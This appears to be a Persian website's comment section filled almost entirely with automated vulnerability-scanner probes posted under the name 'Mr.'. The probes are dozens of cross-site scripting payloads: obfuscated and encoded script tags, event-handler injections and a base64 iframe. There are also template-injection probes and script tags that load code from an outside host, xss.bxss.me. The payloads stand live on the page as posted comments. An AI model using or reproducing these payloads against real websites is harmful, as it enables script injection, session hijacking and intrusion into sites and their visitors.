%D8%AA%D8%A7%D8%B2%D9%87-%D9%87%D8%A7%DB%8C-%D9%86%D8%B4%D8%B1-8

05/08/1400 06:03 ب.ظ
Mr.

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

05/08/1400 06:03 ب.ظ
Mr.

%D8%AA%D8%A7%D8%B2%D9%87-%D9%87%D8%A7%DB%8C-%D9%86%D8%B4%D8%B1-8/.

05/08/1400 06:03 ب.ظ
Mr.

/xfs.bxss.me

05/08/1400 06:04 ب.ظ
Mr.

'"()&%<acx><ScRiPt >yFb3(9401)</ScRiPt>

05/08/1400 06:04 ب.ظ
Mr.

'"

05/08/1400 06:04 ب.ظ
Mr.

<!--

05/08/1400 06:04 ب.ظ
Mr.

'"()&%<acx><ScRiPt >yFb3(9628)</ScRiPt>

05/08/1400 06:04 ب.ظ
Mr.

9713293

05/08/1400 06:04 ب.ظ
Mr.

acu7823<s1﹥s2ʺs3ʹuca7823

05/08/1400 06:04 ب.ظ
Mr.

acux5695��z1��z2a�bcxuca5695

05/08/1400 06:05 ب.ظ
Mr.

<%={{={@{#{${acx}}%>

05/08/1400 06:05 ب.ظ
Mr.

<th:t="${acx}#foreach

05/08/1400 06:05 ب.ظ
Mr.

1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

05/08/1400 06:05 ب.ظ
Mr.

acx{{98991*97996}}xca

05/08/1400 06:05 ب.ظ
Mr.

acx[[${98991*97996}]]xca

05/08/1400 06:05 ب.ظ
Mr.

acx__${98991*97996}__::.x

05/08/1400 06:05 ب.ظ
Mr.

"acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

05/08/1400 06:05 ب.ظ
Mr.

<ScRiPt >yFb3(9542)</ScRiPt>

05/08/1400 06:05 ب.ظ
Mr.

<W9ORMB>JLXW0[!+!]</W9ORMB>

05/08/1400 06:06 ب.ظ
Mr.

<script>yFb3(9915)</script>

05/08/1400 06:06 ب.ظ
Mr.

<ScR<ScRiPt>IpT>yFb3(9195)</sCr<ScRiPt>IpT>

05/08/1400 06:06 ب.ظ
Mr.

<ScRiPt
>yFb3(9113)</ScRiPt>

05/08/1400 06:06 ب.ظ
Mr.

<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9428></ScRiPt>

05/08/1400 06:06 ب.ظ
Mr.

<ScRiPt
>yFb3(9919)</ScRiPt>

05/08/1400 06:06 ب.ظ
Mr.

<svg  

�onload=yFb3(9728);>

05/08/1400 06:06 ب.ظ
Mr.

<isindex type=image src=1 onerror=yFb3(9616)>

05/08/1400 06:06 ب.ظ
Mr.

<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9182'>

05/08/1400 06:06 ب.ظ
Mr.

<body onload=yFb3(9004)>

05/08/1400 06:06 ب.ظ
Mr.

<img src=//xss.bxss.me/t/dot.gif onload=yFb3(9853)>

05/08/1400 06:06 ب.ظ
Mr.

<img src=xyz OnErRor=yFb3(9634)>

05/08/1400 06:07 ب.ظ
Mr.

<img/src=">" onerror=alert(9939)>

05/08/1400 06:07 ب.ظ
Mr.

%0D%0A%3C%53%63%52%69%50%74%20%3E%79%46%62%33%289294%29%3C%2F%73%43%72%69%70%54%3E

05/08/1400 06:07 ب.ظ
Mr.

\u003CScRiPt\yFb3(9192)\u003C/sCripT\u003E

05/08/1400 06:07 ب.ظ
Mr.

&lt;ScRiPt&gt;yFb3(9164)&lt;/sCripT&gt;

05/08/1400 06:07 ب.ظ
Mr.

�<img acu onmouseover=yFb3(90691) //�>

05/08/1400 06:07 ب.ظ
Mr.

<input autofocus onfocus=yFb3(9405)>

21/08/1400 01:17 ب.ظ
CERTest

<s>